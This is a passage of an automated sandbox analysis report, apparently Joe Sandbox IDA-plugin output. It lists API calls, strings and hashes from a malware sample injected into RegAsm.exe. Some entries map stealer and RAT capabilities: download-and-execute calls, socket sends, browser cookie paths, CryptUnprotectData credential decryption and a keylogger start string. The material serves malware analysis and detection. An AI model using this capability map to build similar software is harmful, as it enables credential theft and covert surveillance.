                                                        • Instruction Fuzzy Hash: 784116311083419BC325F722DC55AEFB3A5AF94345F50493EF48A921E2EF385A49C75A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID:
                                                        • API String ID: 269201875-0
                                                        • Opcode ID: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                                        • Instruction ID: 5dce3a056f7b38871bf3701478ebec2c01ef4ac0d1e4adeac0a27022f106ca0c
                                                        • Opcode Fuzzy Hash: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                                        • Instruction Fuzzy Hash: 0741F536A012009FEB20DF78C881A5EB3F1EF89B14F2545AEE515EB341DB35AE01CB84
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01), ref: 00451179
                                                        • __alloca_probe_16.LIBCMT ref: 004511B1
                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?), ref: 00451202
                                                        • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?,00000002,00000000), ref: 00451214
                                                        • __freea.LIBCMT ref: 0045121D
                                                          • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                        • String ID:
                                                        • API String ID: 313313983-0
                                                        • Opcode ID: c0c27e3fa0fc37b5352cac75d9871c7cd610c85ad5d081213d6c80f72d2fc676
                                                        • Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
                                                        • Opcode Fuzzy Hash: c0c27e3fa0fc37b5352cac75d9871c7cd610c85ad5d081213d6c80f72d2fc676
                                                        • Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetEnvironmentStringsW.KERNEL32 ref: 0044F363
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386
                                                          • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
                                                        • _free.LIBCMT ref: 0044F3BF
                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                        • String ID:
                                                        • API String ID: 336800556-0
                                                        • Opcode ID: be8aad2c18c16d35f713b979a96ac7f1c772162f60e003adf0fa877a85dcd87d
                                                        • Instruction ID: 8337c1946637dec1c7c9c61cb05458c13fbc509b7d73539ecc926bc10a2836fd
                                                        • Opcode Fuzzy Hash: be8aad2c18c16d35f713b979a96ac7f1c772162f60e003adf0fa877a85dcd87d
                                                        • Instruction Fuzzy Hash: 2301B173601755BB37211ABA5C8CC7F6A6CDAC6FA5315013FFD14C2202EA68CD0581B9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetLastError.KERNEL32(?,00000000,00000000,0043BC87,00000000,00000000,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044829E
                                                        • _free.LIBCMT ref: 004482D3
                                                        • _free.LIBCMT ref: 004482FA
                                                        • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448307
                                                        • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448310
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLast$_free
                                                        • String ID:
                                                        • API String ID: 3170660625-0
                                                        • Opcode ID: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                                                        • Instruction ID: 817e1e76de570c2b023109a843fda652767a1b5a915d0172e9d2adf04509528a
                                                        • Opcode Fuzzy Hash: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                                                        • Instruction Fuzzy Hash: 5601F936500B0067F3112A2A5C8596F2559EBC2B7A735452FFD19A22D2EFADCC01816D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • _free.LIBCMT ref: 004509D4
                                                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                                                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                        • _free.LIBCMT ref: 004509E6
                                                        • _free.LIBCMT ref: 004509F8
                                                        • _free.LIBCMT ref: 00450A0A
                                                        • _free.LIBCMT ref: 00450A1C
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                        • Instruction ID: 8e1836d4b3683ea2f551dac33bf8b94159c93f8dbbc189607f67f5fa0db289e6
                                                        • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                        • Instruction Fuzzy Hash: F3F04F76504600B79620EB5DE8C2C1B73D9EA0571A795891BF66CDB612CB38FCC0869C
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • _free.LIBCMT ref: 00444066
                                                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                                                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                        • _free.LIBCMT ref: 00444078
                                                        • _free.LIBCMT ref: 0044408B
                                                        • _free.LIBCMT ref: 0044409C
                                                        • _free.LIBCMT ref: 004440AD
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                        • Instruction ID: c4ed0220327abb1134bcf7d54e43c2409a3611c90002b0fe773cef56a7474a4d
                                                        • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                        • Instruction Fuzzy Hash: 11F03AB18009208FA631AF2DBD414053B61E705769346822BF62C62A70C7B94ED2CFCF
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
                                                        • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: DownloadExecuteFileShell
                                                        • String ID: C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe$open
                                                        • API String ID: 2825088817-1632494013
                                                        • Opcode ID: d08d3887d54a038e956607be4ed5306b9f9ca79097eafe3ebd10aa0618e8ef3a
                                                        • Instruction ID: 27a8b34c094a82f854f2ee3e6b31e6014a71d41456184bc7540e3ceb6c1d0c01
                                                        • Opcode Fuzzy Hash: d08d3887d54a038e956607be4ed5306b9f9ca79097eafe3ebd10aa0618e8ef3a
                                                        • Instruction Fuzzy Hash: 6561A171B0830166CA24FB76C8569BE37A59F81748F50093FB942772D2EE3C9905C69B
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • _strpbrk.LIBCMT ref: 0044E738
                                                        • _free.LIBCMT ref: 0044E855
                                                          • Part of subcall function 0043BD19: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043BD1B
                                                          • Part of subcall function 0043BD19: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD3D
                                                          • Part of subcall function 0043BD19: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD44
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                        • String ID: *?$.
                                                        • API String ID: 2812119850-3972193922
                                                        • Opcode ID: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                                        • Instruction ID: 94a4b4bbf586d133b1ca6d09685756ea089c4dad0dcc4a5060c65dcbb11523ea
                                                        • Opcode Fuzzy Hash: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                                        • Instruction Fuzzy Hash: B951C375E00109EFEF14DFAAC881AAEBBB5FF58314F25816EE454E7301E6399E018B54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetKeyboardLayoutNameA.USER32(?), ref: 00409ED3
                                                          • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                                          • Part of subcall function 0041C515: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041C52A
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFileKeyboardLayoutNameconnectsend
                                                        • String ID: XQG$NG$PG
                                                        • API String ID: 1634807452-3565412412
                                                        • Opcode ID: fa8e6cd71303f921af7aa315b6e572632f3cab55c95f2ef26eb534f0bd843a50
                                                        • Instruction ID: e0ccbd324811511655e6ba18c086c0ffec884fa52ef92f7e14ea490dcf81b303
                                                        • Opcode Fuzzy Hash: fa8e6cd71303f921af7aa315b6e572632f3cab55c95f2ef26eb534f0bd843a50
                                                        • Instruction Fuzzy Hash: BA5133315082415AC324F732D852AEFB3E5AFD4348F50493FF44A671E6EF78594AC649
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                        • String ID: `#D$`#D
                                                        • API String ID: 885266447-2450397995
                                                        • Opcode ID: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                                        • Instruction ID: d0478598ef992627c852fcfbe86add3ca1c9fa58067414995f231753f3186543
                                                        • Opcode Fuzzy Hash: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                                        • Instruction Fuzzy Hash: 78519071A00208AFDF18DF59C980AAEBBB2FB94314F59C19AF81897361D7B9DD41CB44
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443475
                                                        • _free.LIBCMT ref: 00443540
                                                        • _free.LIBCMT ref: 0044354A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$FileModuleName
                                                        • String ID: C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
                                                        • API String ID: 2506810119-472202380
                                                        • Opcode ID: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                                        • Instruction ID: 78b8e4ab202bb8962dfea6a4c95dea7b8c186c0554b41bb8e719afd17783d6d0
                                                        • Opcode Fuzzy Hash: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                                        • Instruction Fuzzy Hash: 2E31C471A00258BFEB21DF999C8199EBBBCEF85B15F10406BF50497311D6B89F81CB98
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                          • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,65B51986,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                                          • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5), ref: 0041857E
                                                          • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F), ref: 00418587
                                                          • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                                                        • Sleep.KERNEL32(000000FA,00465E74), ref: 00404138
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                        • String ID: /sort "Visit Time" /stext "$0NG
                                                        • API String ID: 368326130-3219657780
                                                        • Opcode ID: 765a2cec5dfc93fc14e6a06a83629ca65ec94325b3245c099cb6fcf10de14a30
                                                        • Instruction ID: 62b88373b0174ac8ae4090b78ebfd0a8fca35ca34796720d8357018cc2c92f87
                                                        • Opcode Fuzzy Hash: 765a2cec5dfc93fc14e6a06a83629ca65ec94325b3245c099cb6fcf10de14a30
                                                        • Instruction Fuzzy Hash: E9316271A0011956CB15FBA6D8969EE7375AB90308F40007FF206B71E2EF385D89CA99
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SystemParametersInfoW.USER32 ref: 0041CAD7
                                                          • Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                                                          • Part of subcall function 0041376F: RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000), ref: 004137A6
                                                          • Part of subcall function 0041376F: RegCloseKey.KERNEL32(?), ref: 004137B1
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CloseCreateInfoParametersSystemValue
                                                        • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                        • API String ID: 4127273184-3576401099
                                                        • Opcode ID: 4f71dd23c4f760eabc23ec2adbc3392ecf1bb7076945bb966ce08e22b16a15c0
                                                        • Instruction ID: 1197cbbb31bb874c57b9e92d70abebba424d259215afdbf251ae70ffa4d9d73d
                                                        • Opcode Fuzzy Hash: 4f71dd23c4f760eabc23ec2adbc3392ecf1bb7076945bb966ce08e22b16a15c0
                                                        • Instruction Fuzzy Hash: 7B1184B2BC021473D419313E5DABBBE28029743B51F94416BF6123A6C6E8DF0A8102CF
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • _wcslen.LIBCMT ref: 004162F5
                                                          • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                                          • Part of subcall function 00413877: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004138A0
                                                          • Part of subcall function 00413877: RegCloseKey.KERNEL32(004660A4), ref: 004138AB
                                                          • Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$CloseCreateValue
                                                        • String ID: !D@$okmode$PG
                                                        • API String ID: 3411444782-3370592832
                                                        • Opcode ID: 56d367afe2ba597d6a39c7afb1f52fa5ab03872d574dd40714d897b86eaaf0d3
                                                        • Instruction ID: dff749dc984b923ba5de2327a6f3f9cc2e67bcaf748228c26ce3aec7d70e92d7
                                                        • Opcode Fuzzy Hash: 56d367afe2ba597d6a39c7afb1f52fa5ab03872d574dd40714d897b86eaaf0d3
                                                        • Instruction Fuzzy Hash: 10119371B442011ADB187B72D832ABD22969F94358F80443FF54AAF2E2DEBD4C51525D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000), ref: 0040C4F6
                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C688
                                                        Strings
                                                        • User Data\Default\Network\Cookies, xrefs: 0040C603
                                                        • User Data\Profile ?\Network\Cookies, xrefs: 0040C635
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: ExistsFilePath
                                                        • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                        • API String ID: 1174141254-1980882731
                                                        • Opcode ID: f3bc938036da248068b0be9c9c2ef6302554ca2f51a2acae7b142117e121394f
                                                        • Instruction ID: e6b9b9a8142aca5ff9e4641a3ff80a721fb4b0471daa7637ae592fad8ebd6223
                                                        • Opcode Fuzzy Hash: f3bc938036da248068b0be9c9c2ef6302554ca2f51a2acae7b142117e121394f
                                                        • Instruction Fuzzy Hash: B421037190011996CB14F7A2DC96CEEB738EE50319F40053FB502B31D2EF789A46C698
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000), ref: 0040C559
                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C757
                                                        Strings
                                                        • User Data\Default\Network\Cookies, xrefs: 0040C6D2
                                                        • User Data\Profile ?\Network\Cookies, xrefs: 0040C704
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: ExistsFilePath
                                                        • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                        • API String ID: 1174141254-1980882731
                                                        • Opcode ID: cddf59ed0f0a35ae698fc10c37901bb26126bcec9028eb75e0275fc853fc9b73
                                                        • Instruction ID: 83f6a23093d6b0727a30a1d550f3d6f5bdb2bb72864fa742cd8a9fd6423befd9
                                                        • Opcode Fuzzy Hash: cddf59ed0f0a35ae698fc10c37901bb26126bcec9028eb75e0275fc853fc9b73
                                                        • Instruction Fuzzy Hash: AE21D37190011AD6CB05F7A2DC96CEEB778EE50719B50013FF502B31D2EF789A46C698
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                                        • wsprintfW.USER32 ref: 0040B1F3
                                                          • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: EventLocalTimewsprintf
                                                        • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                        • API String ID: 1497725170-1359877963
                                                        • Opcode ID: c8cd868dd362bd9616f6924cb695c27546a7cf7ec47136230a452d94a8988757
                                                        • Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
                                                        • Opcode Fuzzy Hash: c8cd868dd362bd9616f6924cb695c27546a7cf7ec47136230a452d94a8988757
                                                        • Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                                          • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040AF6E
                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040AF7A
                                                        • CreateThread.KERNEL32(00000000,00000000,0040A295,?,00000000,00000000), ref: 0040AF86
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CreateThread$LocalTime$wsprintf
                                                        • String ID: Online Keylogger Started
                                                        • API String ID: 112202259-1258561607
                                                        • Opcode ID: 958200284c2bea51d202cfda8ca6d09af1b0fae5d8a7627b3d8146febcef491d
                                                        • Instruction ID: a86b307176fed80e65d2d8085b20e14cf0e56bf63d45b36b749a5edd9f3e52e0
                                                        • Opcode Fuzzy Hash: 958200284c2bea51d202cfda8ca6d09af1b0fae5d8a7627b3d8146febcef491d
                                                        • Instruction Fuzzy Hash: 1401C8A070031939E62076365C87D7F7A5DCA81398F40057FF645362C6D97D1C5586FB
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LoadLibraryA.KERNEL32(crypt32), ref: 00406A82
                                                        • GetProcAddress.KERNEL32(00000000), ref: 00406A89
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: CryptUnprotectData$crypt32
                                                        • API String ID: 2574300362-2380590389
                                                        • Opcode ID: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                                        • Instruction ID: d796ed41fc96dc9ef8d801536240fab0e9422483ab40f89d2a564a4d0f07de08
                                                        • Opcode Fuzzy Hash: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                                        • Instruction Fuzzy Hash: 6201B535B00216ABCB18DFAD9D449ABBBB8EB49300F14817EE95AE3341D674D9008BA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                        • CloseHandle.KERNEL32(?), ref: 004051CA
                                                        • SetEvent.KERNEL32(?), ref: 004051D9
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CloseEventHandleObjectSingleWait
                                                        • String ID: Connection Timeout
                                                        • API String ID: 2055531096-499159329
                                                        • Opcode ID: 0fd579d592e0ec80786bd468370273e6dda72da4d01b044bfcfe4f18e9b09a20
                                                        • Instruction ID: e4880b57ed2806ada623013920947221b56867654f576af2420d72dde76e11cf
                                                        • Opcode Fuzzy Hash: 0fd579d592e0ec80786bd468370273e6dda72da4d01b044bfcfe4f18e9b09a20
                                                        • Instruction Fuzzy Hash: 1201D831A40F40AFE7257B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E833
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Exception@8Throw
                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                        • API String ID: 2005118841-1866435925
                                                        • Opcode ID: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
                                                        • Instruction ID: aca7d9cae529c24a85643cb8f0975e7fdd15ab88b82278639a3f13e82648cb6f
                                                        • Opcode Fuzzy Hash: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
                                                        • Instruction Fuzzy Hash: 2C01B1315443086AE618F693C843FAA73585B10708F108C2FAA15761C2F67D6961C66B
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041381F
                                                        • RegSetValueExW.ADVAPI32 ref: 0041384D
                                                        • RegCloseKey.ADVAPI32(004752D8), ref: 00413858
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CloseCreateValue
                                                        • String ID: pth_unenc
                                                        • API String ID: 1818849710-4028850238
                                                        • Opcode ID: 0de8c57798d2a052ed48f9ba6d58c7c81afdedd1aa2e5c5a2a8de63742f16a74
                                                        • Instruction ID: 91b44a8789fefabe47d0aed0b401f4e945a8dec35bb1902c17c37083bf943f80
